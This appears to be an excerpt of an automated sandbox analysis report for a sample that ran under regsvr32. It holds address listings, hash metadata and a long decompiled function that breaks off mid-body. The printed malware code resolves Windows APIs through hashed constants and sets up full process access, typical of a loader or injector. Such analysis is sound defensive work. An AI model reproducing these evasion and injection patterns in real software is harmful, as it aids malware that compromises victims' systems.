0x00487ce3
0x00487ce3
0x00487ce7
0x00487ce8
0x00487cea
0x00000000
0x00000000
0x00000000
0x00487cea
0x00487cec
0x00487cf0
0x00487cf0
0x00000000
0x00487cb9
0x00487bbe
0x00487bae
0x00487baa
0x00000000
0x00000000
0x00000000
0x00487ab1
0x00000000
0x00487ab3
0x00487ab7
0x00487ab8
0x00487ab8
0x00000000
0x00487f41
0x00487f45
0x00487f46
0x00487f46
0x00487f4e
0x00487f53
0x00487f55
0x00487e4b
0x00487e4b
0x00487e52
0x00487e54
0x00487e5a
0x00487e5c
0x00487e5e
0x00487e95
0x00487e60
0x00487e60
0x00487e62
0x00487e64
0x00487e67
0x00487e69
0x00487e6b
0x00487e6d
0x00487e6d
0x00487e6f
0x00487e6f
0x00487e70
0x00487e75
0x00487e79
0x00487e7b
0x00000000
0x00000000
0x00487e7d
0x00487e81
0x00487e84
0x00487e86
0x00000000
0x00000000
0x00000000
0x00487e86
0x00487e6f
0x00487e6b
0x00487e88
0x00487e88
0x00487e8a
0x00487e8b
0x00487e90
0x00487e90
0x00487e98
0x00487e9b
0x00487e9d
0x00000000
0x00487cf4
0x00487cf8
0x00487cf9
0x00487cfc
0x00487cfc
0x00487d04
0x00487d04
0x00487d07
0x00487d07
0x00487d09
0x00487d0b
0x00487d0e
0x00487d0e
0x00487d11
0x00000000
0x00487d17
0x00487d19
0x00487d19
0x00487d1c
0x00487d30
0x00487d34
0x00487d40
0x00487d40
0x00487d46
0x00487d46
0x00487d4b
0x00487d4f
0x00487d53
0x00487d55
0x00000000
0x00000000
0x00487d5b
0x00487d5e
0x00487d60
0x00000000
0x00487d62
0x00487d62
0x00487d68
0x00487d79
0x00487d79
0x00000000
0x00487d6a
0x00487d6a
0x00487d6e
0x00000000
0x00000000
0x00487d70
0x00487d71
0x00487d77
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00487d77
0x00487d6a
0x00487d68
0x00000000
0x00487d60
0x00487ec1
0x00487ec4
0x00487d1e
0x00487d20
0x00487d22
0x00487d22
0x00487d25
0x00487d25
0x00487d29
0x00000000
0x00000000
0x00487d2b
0x00487d2c
0x00487d2e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00487d2e
0x00487d25
0x00487d7e
0x00487d83
0x00487d83
0x00487d86
0x00487d89
0x00487d8c
0x00487d8e
0x00487da1
0x00487da4
0x00487da4
0x00487daa
0x00487db2
0x00487db2
0x00487db2
0x00487db5
0x00487dbc
0x00487dbf
0x00487dc5
0x00487dc7
0x00487dcd
0x00487dcf
0x00487dd1
0x00487e20
0x00487dd3
0x00487dd3
0x00487dd5
0x00487dd7
0x00487dda
0x00487ddc
0x00487dde
0x00487de0
0x00487de2
0x00487de5
0x00487de9
0x00487deb
0x00487deb
0x00487dec
0x00487df1
0x00487df5
0x00487df7
0x00000000
0x00000000
0x00487df9
0x00487dfd
0x00487e00
0x00487e02
0x00000000
0x00000000
0x00000000
0x00487e02
0x00487e04
0x00487e07
0x00487e07
0x00487dde
0x00487e0b
0x00487e0d
0x00487e0e
0x00487e12
0x00487e17
0x00487e1b
0x00487e1b
0x00487e23
0x00487e26
0x00487e29
0x00487d90
0x00487d90
0x00487d90
0x00487e2b
0x00487e2d
0x00487e2f
0x00487e31
0x00487e37
0x00487e37
0x00487e3a
0x00487e3b
0x00487e3d
0x00487e3f
0x00000000
0x00000000
0x00487e41
0x00487e43
0x00487ebb
0x00000000
0x00000000
0x00000000
0x00000000
0x00487e45
0x00487e45
0x00487e47
0x00487e35
0x00487e36
0x00487e36
0x00000000
0x00487e36
0x00000000
0x00487e47
0x00487e37
0x00487e2f
0x00487d11
0x0048779f
0x00487798
0x004876f5
0x00487ea4
0x00487ea4
0x00487ea6
0x00487ea7
0x00487eb8
0x00487674
0x00487674
0x00487679
0x0048767b
0x0048767d
0x00487685
0x00487687
0x0048768d
0x00487691
0x004876c8
0x00487693
0x00487695
0x00487697
0x0048769a
0x0048769e
0x004876a0
0x004876a2
0x004876a2
0x004876a3
0x004876a8
0x004876ae
0x00000000
0x00000000
0x004876b0
0x004876b4
0x004876b9
0x00000000
0x00000000
0x00000000
0x004876b9
0x004876a2
0x0048769e
0x004876bb
0x004876bb
0x004876bd
0x004876be
0x004876c3
0x004876c3
0x004876cb
0x004876ce
0x004876d5
0x004876e0
0x004876e0
0x00000000

Strings

w8I, xrefs: 00487848
w8I, xrefs: 00487886, 004878F2, 00487A7C, 0048789D, 0048787A, 004878C5
@, xrefs: 00487FA2

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @$w8I$w8I
API String ID: 0-3084069163
Opcode ID: 52cf54630ff8bdc2b50b66d371acd1fbb21b2ea9802d435e193b7f6b95655d85
Instruction ID: bdd6c6d97954be337cc868020779e5cad6d7400392a5e27d5df855405f88ac75
Opcode Fuzzy Hash: 52cf54630ff8bdc2b50b66d371acd1fbb21b2ea9802d435e193b7f6b95655d85
Instruction Fuzzy Hash: 54522971A0C3524BD726AE3884A032F77D2AF92354F388E6ED9959B392D63CCD41C785

Uniqueness

Uniqueness Score: -1.00%

Function 00461570, Relevance: 3.6, Strings: 2, Instructions: 1143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E00461570(signed int __ecx, void* __edx, void* __eflags) {
				char _v44;
				intOrPtr _v48;
				char _v56;
				char _v72;
				char _v80;
				void* _v116;
				char _v124;
				char _v128;
				signed int _v136;
				char _v140;
				char _v144;
				void* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				signed int _v168;
				char _v172;
				char _v176;
				void* _v184;
				void* _v188;
				void* _v192;
				char _v196;
				void* _v212;
				char _v216;
				void* _v220;
				char _v224;
				char _v228;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				void* _v252;
				intOrPtr _v276;
				char _v280;
				char _v288;
				void* _v292;
				char _v296;
				void* _v300;
				intOrPtr _v308;
				signed int _v328;
				void* _v348;
				void* _v352;
				char _v356;
				char _v368;
				char _v372;
				void* _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v428;
				char _v432;
				char _v436;
				char _v444;
				char _v448;
				char _v452;
				char _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				void* _v592;
				void* _v596;
				void* _v600;
				void* _v604;
				intOrPtr _v608;
				void* _v612;
				void* _v616;
				void* _v620;
				void* _v624;
				void* _v628;
				void* _v632;
				void* _v636;
				void* _v640;
				void* _v644;
				void* _v648;
				void* _v668;
				void* _v1676;
				void* _v1684;
				void* _v1692;
				void* _v1708;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				intOrPtr _v1816;
				void* _v1820;
				void* _v1824;
				void* _v1828;
				void* _v1832;
				void* _v1836;
				void* _v1840;
				void* _v1844;
				void* _v1848;
				void* _v1852;
				void* _v1856;
				void* _v1860;
				void* _v1864;
				void* _v1868;
				void* _v1872;
				void* _v1876;
				void* _v1956;
				void* _v1960;
				void* _v2760;
				void* _v2764;
				void* _v2768;
				void* _v2772;
				void* _v2776;
				intOrPtr _v2820;
				signed int _v2860;
				void* _v2864;
				intOrPtr _v2868;
				intOrPtr _v2872;
				intOrPtr _v2876;
				void* _v2880;
				intOrPtr _v2884;
				void* _v2888;
				void* _v2896;
				void* _v2904;
				intOrPtr _v2908;
				void* _v2912;
				intOrPtr _v2916;
				void* _v2920;
				void* _v2928;
				void* _v2936;
				void* _v2940;
				void* _v2944;
				void* _v2948;
				void* _v2952;
				void* _v2956;
				char _v2960;
				void* _v2964;
				void* _v2968;
				void* _v2976;
				void* _v2984;
				signed int _v2988;
				signed int _v2992;
				void* _v3000;
				void* _v3020;
				void* _v3048;
				void* _v3052;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t313;
				signed int _t317;
				void* _t322;
				signed int _t325;
				signed int _t329;
				void* _t345;
				intOrPtr _t368;
				signed int _t370;
				signed int _t379;
				signed int _t383;
				signed int _t387;
				signed int _t562;
				signed int _t571;
				signed int _t585;
				signed int _t586;
				signed int _t595;
				signed int _t599;
				signed int _t620;
				signed int _t621;
				signed int _t782;
				void* _t800;
				signed int _t803;
				void* _t812;
				signed int _t817;
				signed int _t820;
				signed int _t831;
				void* _t833;
				void* _t834;
				void* _t835;
				void* _t838;

				_t827 = _t831;
				_push(_t800);
				_t833 = (_t831 & 0xffffffe0) - 0xad4;
				_t595 = __ecx;
				_t812 = __edx;
				E0048B6B0( &_v44,  *((intOrPtr*)(__ecx + 0x1c)));
				_push(0);
				E00491C80(__ecx,  &_v72, _t800, __edx, _t831, _v48);
				E00480B10( &_v56);
				if(E00491F90(_t595,  &_v80, _t831, 0) != 0) {
					_push(0);
					E00489350( &_v168);
					_push(0);
					E00489350( &_v156);
					_push(0);
					E00489350( &_v144);
					__eflags = _t595;
					_t11 = _t595 + 0xc; // 0xc
					_t612 =  ==  ? _t595 : _t11;
					_t313 = E0048BEA0( ==  ? _t595 : _t11, 0x1d, _t812);
					__eflags = _t313;
					if(_t313 != 0) {
						_push(0x1fffff);
						E0048EA50(_t595);
					}
					__eflags = _t595;
					_t12 = _t595 + 0xc; // 0xc
					_t802 =  ==  ? _t595 : _t12;
					_push(0);
					_push(0);
					_t803 =  *( ==  ? _t595 : _t12);
					E00492060(_t595,  &_v228, _t803, _t812);
					 *(_t833 + 0xa78) = 0;
					asm("pxor xmm0, xmm0");
					_v128 = 1;
					asm("movq [esp+0xa90], xmm0");
					 *((intOrPtr*)(_t833 + 0xa90)) = E00489650(_t812);
					_t317 = E004715C0(0x588ab3ea, 0xa65417fb);
					__eflags = _t317;
					if(_t317 == 0) {
						 *(_t833 + 0x40) = 0;
						E0048BDC0(_t833 + 0xa7c,  *((intOrPtr*)(_t833 + 0xa8c)));
						__eflags =  *(_t833 + 0x40);
						if( *(_t833 + 0x40) == 0) {
							_v124 = 0;
							_v136 = 0;
							_v140 = 0;
							 *((intOrPtr*)(_t833 + 0xa84)) = 0;
							_t782 = E004715C0(0x588ab3ea, 0x9cac62c7);
							__eflags = _t782;
							if(_t782 != 0) {
								 *(_t833 + 0x40) =  *(_t833 + 0xa78);
								 *(_t833 + 0x44) = _t782;
								_t322 = E00489650(_t812);
								_t783 =  *(_t833 + 0x44);
								 *(_t833 + 0x50) = _t803;
								_t803 =  *(_t833 + 0x78);
								_t325 =  *( *(_t833 + 0x44))( *((intOrPtr*)(_t833 + 0x64)), 0xffffffff, _t833 + 0xaa0, 0, _t322,  &_v140,  &_v124, 2, 0, 4);
								__eflags = _t325;
								if(_t325 == 0) {
									goto L11;
								} else {
									__eflags = _v168;
									if(_v168 != 0) {
										goto L53;
									}
									goto L54;
								}
							} else {
								L11:
								 *(_t833 + 0x40) = E00489640(_t812, 0);
								E00470C10(_v164,  *(_t833 + 0x44), E00489650(_t812));
								_t833 = _t833 + 0xc;
								_t329 = E004715C0(0x588ab3ea, 0xa8f2638d);
								__eflags = _t329;
								if(_t329 == 0) {
									 *(_t833 + 0x4bc) = 0;
									_t620 = E004715C0(0x588ab3ea, 0xea812079);
									__eflags = _t620;
									if(_t620 == 0) {
										L17:
										_v140 =  *(_t833 + 0x4bc);
										_t621 = E004715C0(0x588ab3ea, 0xea812079);
										__eflags = _t621;
										if(_t621 == 0) {
											L26:
											_v136 =  *(_t833 + 0x4bc);
											__eflags = _v168;
											if(_v168 != 0) {
												E0048BE30( &_v172, _t812);
											}
											__eflags = E0048ED90(_t595) - 0x20;
											_push(0);
											_t336 =  ==  ? 0x498600 : 0x498c40;
											_push( ==  ? 0x498600 : 0x498c40);
											E00471BA0(E0048ED90(_t595) - 0x20, _t833 + 0xac0);
											E00489B10( &_v240);
											E00480B10( &_v124);
											E00489670( &_v228, E00489A90( &_v244, _t812));
											 *(_t833 + 0x40) = E00489640( &_v248, 0);
											E0046AC20(_t827,  *(_t833 + 0x44), E00489640( &_v236, 0),  *((intOrPtr*)(_t833 + 0xab8)));
											_t834 = _t833 + 8;
											_t345 = E0048ED90(_t595);
											__eflags = _t345 - 0x20;
											if(_t345 == 0x20) {
												E00470B70(_t834 + 0x40, 0, 0x47c);
												_t835 = _t834 + 0xc;
												 *((intOrPtr*)(_t835 + 0x44c)) = E00489650(_t812);
												 *((intOrPtr*)(_t835 + 0x444)) = 0x56473829;
												 *((intOrPtr*)(_t835 + 0x46c)) = E004715C0(0x588ab3ea, 0x9cac62c7);
												 *((intOrPtr*)(_t835 + 0x470)) = E004715C0(0x588ab3ea, 0xa8f2638d);
												 *((intOrPtr*)(_t835 + 0x474)) = E004715C0(0x588ab3ea, 0xd8cc7390);
												 *((intOrPtr*)(_t835 + 0x478)) = E004715C0(0x588ab3ea, 0xd16c9225);
												 *((intOrPtr*)(_t835 + 0x47c)) = E004715C0(0x588ab3ea, 0x649746ec);
												 *((intOrPtr*)(_t835 + 0x480)) = E004715C0(0x588ab3ea, 0xe5ef1afa);
												 *((intOrPtr*)(_t835 + 0x484)) = E004715C0(0x588ab3ea, 0x58d59bc9);
												 *((intOrPtr*)(_t835 + 0x488)) = E004715C0(0x588ab3ea, 0x35b39b2b);
												 *((intOrPtr*)(_t835 + 0x48c)) = E004715C0(0x588ab3ea, 0xe9fbf3a8);
												 *((intOrPtr*)(_t835 + 0x490)) = E004715C0(0x588ab3ea, 0xbcd9ca71);
												 *((intOrPtr*)(_t835 + 0x494)) = E004715C0(0x588ab3ea, 0x4faea65b);
												 *((intOrPtr*)(_t835 + 0x498)) = E004715C0(0x588ab3ea, 0xc0b67de0);
												 *((intOrPtr*)(_t835 + 0x49c)) = E004715C0(0x588ab3ea, 0x996e050f);
												 *((intOrPtr*)(_t835 + 0x4a0)) = E004715C0(0x588ab3ea, 0x81c9e4a7);
												 *((intOrPtr*)(_t835 + 0x4a4)) = E004715C0(0x588ab3ea, 0x97abe05f);
												_v1800 = E004715C0(0x588ab3ea, 0x82d274c4);
												_v1804 = E004715C0(0xa1310f65, 0x77be1f6);
												_v1808 = E004715C0(0xa1310f65, 0xe2d27ff4);
												_v1812 = E004715C0(0xa1310f65, 0x69121530);
												_t368 = E004715C0(0xa1310f65, 0xf1c64384);
												 *((intOrPtr*)(_t835 + 0x464)) = _v308;
												_v1816 = _t368;
												 *((intOrPtr*)(_t835 + 0x468)) =  *((intOrPtr*)(_t835 + 0xa98));
												E00489710( &_v368,  &_v2960, 0x47c);
												_push(_t835 + 0xa60);
												_push(0x4bc);
												_t785 =  &_v392;
												_t370 = E0046E900(_t595,  &_v392);
											} else {
												E00470B70(_t834 + 0x4c0, 0, 0x4f0);
												_t838 = _t834 + 0xc;
												_v608 = E00489650(_t812);
												 *((intOrPtr*)( &_v384 - 0xe8)) = 0x56473829;
												_push(0);
												E00489350( &_v384);
												 *((intOrPtr*)(_t838 + 0x40)) = 0x3b4caff7;
												asm("pxor xmm0, xmm0");
												asm("movq [esp+0x48], xmm0");
												E00489670( &_v388, E00489650( &_v388) + 0x10);
												E00489640( &_v392, E00489650( &_v392) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x9cac62c7;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v396, E00489650( &_v396) + 0x10);
												E00489640( &_v400, E00489650( &_v400) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2820 = 0xa8f2638d;
												asm("movq [esp+0x48], xmm1");
												E00489670(_t838 + 0x9b4, E00489650(_t838 + 0x9b0) + 0x10);
												E00489640( &_v408, E00489650( &_v408) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xd8cc7390;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v412, E00489650( &_v412) + 0x10);
												E00489640( &_v416, E00489650( &_v416) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xd16c9225;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v420, E00489650( &_v420) + 0x10);
												E00489640(_t838 + 0x9b4, E00489650(_t838 + 0x9b0) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x649746ec;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v428, E00489650( &_v428) + 0x10);
												E00489640( &_v432, E00489650( &_v432) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xe5ef1afa;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v436, E00489650( &_v436) + 0x10);
												E00489640(_t838 + 0x9b4, E00489650(_t838 + 0x9b0) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2860 = 0x58d59bc9;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v444, E00489650( &_v444) + 0x10);
												E00489640( &_v448, E00489650( &_v448) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2868 = 0x35b39b2b;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v452, E00489650( &_v452) + 0x10);
												E00489640( &_v456, E00489650( &_v456) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2876 = 0xe9fbf3a8;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v460, E00489650( &_v460) + 0x10);
												E00489640( &_v464, E00489650( &_v464) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2884 = 0xbcd9ca71;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v468, E00489650( &_v468) + 0x10);
												E00489640( &_v472, E00489650( &_v472) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x4faea65b;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v476, E00489650( &_v476) + 0x10);
												E00489640( &_v480, E00489650( &_v480) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xc0b67de0;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v484, E00489650( &_v484) + 0x10);
												E00489640( &_v488, E00489650( &_v488) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2908 = 0x996e050f;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v492, E00489650( &_v492) + 0x10);
												E00489640( &_v496, E00489650( &_v496) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2916 = 0x81c9e4a7;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v500, E00489650( &_v500) + 0x10);
												E00489640( &_v504, E00489650( &_v504) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x97abe05f;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v508, E00489650( &_v508) + 0x10);
												E00489640( &_v512, E00489650( &_v512) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x82d274c4;
												asm("movq [esp+0x48], xmm1");
												E00489670( &_v516, E00489650( &_v516) + 0x10);
												__eflags = E00489650( &_v520) + 0xfffffff0;
												E00489640( &_v520, E00489650( &_v520) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("movups [eax], xmm0");
												E00491270(0x588ab3ea,  &_v524);
												E00489640( &_v524, 0x10);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x910], xmm0");
												E00489640( &_v528, 0x20);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x918], xmm0");
												E00489640( &_v532, 0x30);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x920], xmm0");
												E00489640( &_v536, 0x40);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x928], xmm0");
												E00489640( &_v540, 0x50);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x930], xmm0");
												E00489640( &_v544, 0x60);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x938], xmm0");
												E00489640( &_v548, 0x70);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x940], xmm0");
												E00489640( &_v552, 0x80);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x948], xmm0");
												E00489640( &_v556, 0x90);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x950], xmm0");
												E00489640( &_v560, 0xa0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x958], xmm0");
												E00489640( &_v564, 0xb0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x960], xmm0");
												E00489640( &_v568, 0xc0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x968], xmm0");
												E00489640( &_v572, 0xd0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x970], xmm0");
												E00489640( &_v576, 0xe0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x978], xmm0");
												E00489640( &_v580, 0xf0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x980], xmm0");
												E00489640( &_v584, 0x100);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x988], xmm0");
												E00489640( &_v588, 0);
												asm("movq xmm0, [eax+0x8]");
												_t819 =  &_v544;
												asm("movdqu [esp+0x60], xmm0");
												E00470B70( &_v544, 0, 0x30);
												_t835 = _t838 + 0xc;
												asm("movd xmm4, edi");
												asm("cdq");
												asm("pxor xmm0, xmm0");
												asm("movdqu [eax-0x950], xmm0");
												_v2992 = _t803;
												asm("movd xmm1, edx");
												asm("cdq");
												asm("movd xmm3, eax");
												asm("punpckldq xmm4, xmm1");
												asm("movd xmm2, edx");
												asm("punpckldq xmm3, xmm2");
												asm("movdqu [esp+0x70], xmm3");
												asm("movdqu [eax-0x960], xmm4");
												_v2988 = _t595;
												do {
													asm("movdqu xmm0, [esp+0x60]");
													asm("movq [esp], xmm0");
													asm("pxor xmm5, xmm5");
													_v2860 = 6;
													asm("movdqu xmm1, [esp+0x80]");
													asm("movq [esp+0xc], xmm1");
													asm("movdqu xmm2, [esp+0x90]");
													asm("movq [esp+0x14], xmm2");
													asm("movq [esp+0x1c], xmm5");
													asm("movdqu xmm3, [esp+0x70]");
													asm("movq xmm4, [0x4993d8]");
													asm("movq [esp+0x24], xmm3");
													asm("movq [esp+0x2c], xmm4");
													asm("movq [esp+0x34], xmm5");
													_t599 = E004904B0(_t803, _t819);
													_t803 =  *(_t835 + 0x9e0);
													_t819 =  *((intOrPtr*)(_t835 + 0x9e4));
													asm("movq xmm0, [esp+0x9f8]");
													__eflags =  ~( *(_t835 + 0x9e8)) + _t803 |  ~_v328 + _t819;
													asm("movdqu xmm1, [esp+0x90]");
													asm("paddq xmm1, xmm0");
													asm("movdqu [esp+0x90], xmm1");
													if(( ~( *(_t835 + 0x9e8)) + _t803 |  ~_v328 + _t819) != 0) {
														goto L35;
													} else {
														_push(0x400);
														E00489350( &_v356);
														 *(_t835 + 0x5c) = E00489640(_t835 + 0x9d4, 0);
														 *((intOrPtr*)(_t835 + 0x58)) = E00489640(_t835 + 0x9d4, 0);
														E00489650( &_v368);
														asm("movdqu xmm0, [esp+0x60]");
														asm("movd xmm6, ecx");
														asm("movq [esp], xmm0");
														_v2872 = 6;
														asm("pxor xmm7, xmm7");
														asm("movdqu xmm1, [esp+0x80]");
														asm("movq xmm2, [0x4993d0]");
														asm("movq [esp+0xc], xmm1");
														_v2860 = _t803;
														 *((intOrPtr*)(_t835 + 0x18)) = _t819;
														asm("movq [esp+0x1c], xmm2");
														asm("cdq");
														asm("movd xmm4, eax");
														asm("movd xmm3, edx");
														asm("cdq");
														asm("punpckldq xmm4, xmm3");
														asm("movq [esp+0x24], xmm4");
														asm("movd xmm5, edx");
														asm("punpckldq xmm6, xmm5");
														asm("movq [esp+0x2c], xmm6");
														asm("movq [esp+0x34], xmm7");
														_t562 = E004904B0(_t803, _t819);
														__eflags = _t562;
														if(_t562 != 0) {
															L56:
															E00489510(_t835 + 0x9d0);
															_t803 = 0xe5ab9b45;
														} else {
															__eflags =  *( *(_t835 + 0x5c)) & 0x0000ffff;
															if(__eflags == 0) {
																goto L56;
															} else {
																E004783B0(_t835 + 0xa28);
																_t819 = _t835 + 0xa30;
																E00482E60(_t835 + 0xa30, __eflags, _t835 + 0xa30, 0x5c);
																E00481020(_t835 + 0xa30, _t835 + 0xa38);
																_t571 = E0048D620( *((intOrPtr*)(_t835 + 0xa38)), E00486040( *((intOrPtr*)(_t835 + 0xa38)), 0x7fffffff));
																E00480B10(_t835 + 0xa38);
																E00480B10(_t835 + 0xa30);
																E00480B10(_t835 + 0xa28);
																E00489510( &_v372);
																_t803 = _t571 ^ 0x38ba5c7b;
																__eflags = _t803;
															}
														}
														__eflags = _t803 - 0xa1310f65;
														if(__eflags == 0) {
															_t803 =  *(_t835 + 0x50);
															_t595 =  *(_t835 + 0x54);
															_t820 =  *(_t835 + 0x9e0);
															 *((intOrPtr*)(_t835 + 0x58)) =  *((intOrPtr*)(_t835 + 0x9e4));
														} else {
															goto L35;
														}
													}
													L37:
													E0046DE60( &_v372, _t803, __eflags, _t820,  *((intOrPtr*)(_t835 + 0x58)));
													E0048A110( &_v396);
													 *((intOrPtr*)(_t835 + 0x40)) = 0xe2d27ff4;
													asm("pxor xmm0, xmm0");
													asm("movq [esp+0x48], xmm0");
													E00489670( &_v396, E00489650( &_v396) + 0x10);
													E00489640( &_v400, E00489650( &_v400) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													_v2820 = 0x69121530;
													asm("movq [esp+0x48], xmm1");
													E00489670(_t835 + 0x9b4, E00489650(_t835 + 0x9b0) + 0x10);
													E00489640( &_v408, E00489650( &_v408) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													 *((intOrPtr*)(_t835 + 0x40)) = 0x77be1f6;
													asm("movq [esp+0x48], xmm1");
													E00489670( &_v412, E00489650( &_v412) + 0x10);
													E00489640( &_v416, E00489650( &_v416) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													 *((intOrPtr*)(_t835 + 0x40)) = 0xf1c64384;
													asm("movq [esp+0x48], xmm1");
													E00489670( &_v420, E00489650( &_v420) + 0x10);
													__eflags = E00489650(_t835 + 0x9b0) + 0xfffffff0;
													E00489640(_t835 + 0x9b4, E00489650(_t835 + 0x9b0) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													_push( &_v428);
													_push(_v2820);
													_push(_t820);
													asm("movups [edx], xmm0");
													E0046E780( &_v412, _t820, __eflags);
													E00489640(_t835 + 0x9b4, 0);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x998], xmm0");
													E00489640( &_v444, 0x10);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x9a0], xmm0");
													E00489640( &_v448, 0x20);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x990], xmm0");
													E00489640( &_v452, 0x30);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [ecx-0x18], xmm0");
													E00489510(_t835 + 0x9c0);
													E00489510( &_v456);
													asm("cdq");
													asm("movd xmm1, eax");
													asm("movd xmm0, edx");
													asm("cdq");
													asm("movd xmm3, eax");
													asm("punpckldq xmm1, xmm0");
													asm("movq [esp+0x900], xmm1");
													asm("movd xmm2, edx");
													asm("punpckldq xmm3, xmm2");
													asm("movq [esp+0x908], xmm3");
													E00489710( &_v280, _t835 + 0x4c4, 0x4f0);
													_t785 = _t835 + 0xa58;
													_t370 = E0046ACD0(_t595, _t835 + 0xa58, __eflags, 0x5c8,  &_v288);
													goto L38;
													L35:
													__eflags = _t599;
												} while (_t599 == 0);
												_t820 = 0;
												__eflags = 0;
												_t803 =  *(_t835 + 0x50);
